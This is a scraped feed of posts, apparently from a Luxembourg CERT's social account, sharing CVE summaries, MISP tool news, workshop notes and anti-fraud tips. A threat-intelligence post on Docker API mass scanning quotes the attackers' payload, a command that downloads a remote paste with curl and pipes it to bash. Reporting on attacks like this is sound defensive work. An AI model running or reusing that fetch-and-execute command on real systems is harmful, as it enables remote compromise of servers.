"phpMyAdmin before 4.9.2 does not escape certain Git information, related to libraries/classes/Display/GitRevision.php and libraries/classes/Footer.php."

cve.circl.lu/cve/CVE-2019-1961 …

"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions."

cve.circl.lu/cve/CVE-2019-7192 …

@Europol @EC3Europol @EBFeu

Niemals Ihre Kontoverbindung an jemanden weiter geben sofern Sie die Person nicht kennen
Zugangsdaten für Ihr /Kartendaten nicht weiter geben
Vorsicht bei unverlangten Angeboten, die leichtes Geld versprechenpic.twitter.com/sRTs7Hu22X

MISP 2.4.119 has been released with many improvements in the API, a security fix for CVE-2019-19379 and various changes. New MISP expansion, import and export modules were introduced.
misp-project.org/2019/12/04/MI …pic.twitter.com/9A0mz8kEz7

"D-Link DAP-1860 devices before v1.04b03 Beta allow access to administrator functions without authentication via the HNAP_AUTH header timestamp value."

cve.circl.lu/cve/CVE-2019-1959 …

winter is here but Santa has free tools for you!

If you receive a suspicious message you can check the link via
circl.lu/urlabuse/  and send it to @circl_lu via info@circl.lu

We have a new galaxy and object to express dark patterns in MISP. A good example of using MISP to model and share new threats targeting users.
Thanks to @gallypette (@circl_lu) and @b0rce (@uni_lu)
misp-project.org/galaxy.html#_ …pic.twitter.com/URHrF1Maei

We have an ongoing MISP User Experience Survey together with the @uni_lu (@b0rce) - Don't hesitate to participate, it will help us to improve the UX experience of MISP. @circl_lu
misp-project.org/ux-survey 

If you are wondering why our
cve.circl.lu  (@cve_search) is sometime a bit slow, we have a significant number of queries per second. We strongly recommend to install your own cve-search instance. Everything is open source and the full data dump is also available.pic.twitter.com/WmA4itAe5g

If you have your own and local cve-search server. It's faster and you are not leaking queries or searches about your findings to third-parties (even if it's CIRCL in this case ;-).

cve-search.org/ 

Yes, @circl_lu's BGP Ranking tool is one of our favorite resources.

A great use case for our @hns_platform . It is always a pleasure to work with @circl_lu and @ceis_strat.
twitter.com/bluecyforce/status …

This week, we hosted a workshop for the with @ceis_strat and @circl_lu. Our @hns_platform was providing a virtual infrastructure with multiple @MISPProject, @d4_project and AIL framework instances.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4
ix.io/1XQa  | bash;'",
.twitter.com/vxszV5SF1o

During the network traffic analysis workshop of a recent network telescope dataset, we saw that Mirai (and others) are more frequently scanning TCP port 26. Mirai variants are still actively relying on setting the ISN with the destination IP address (as seen in the graph below).pic.twitter.com/tpu8LSUoNw

"An Improper Input Validation vulnerability in the SSL VPN portal of FortiOS versions 6.2.1 and below, and 6.0.6 and below may allow an unauthenticated remote attacker to crash the SSL VPN service by sending a crafted POST request."

cve.circl.lu/cve/CVE-2019-1570 …

"Dell EMC Storage Monitoring and Reporting version 4.3.1 contains a Java RMI Deserialization of Untrusted Data vulnerability."

cve.circl.lu/cve/CVE-2019-1858 …

RHSA-2019:3958: Critical: Red Hat Security Advisory: Red Hat Ansible Tower 3.6.1-1 - EL7 Container red.ht/35zag8M 

Show more
OpenCloud Luxembourg Mastodon instance

A Mastodon instance for Luxembourg and beyond.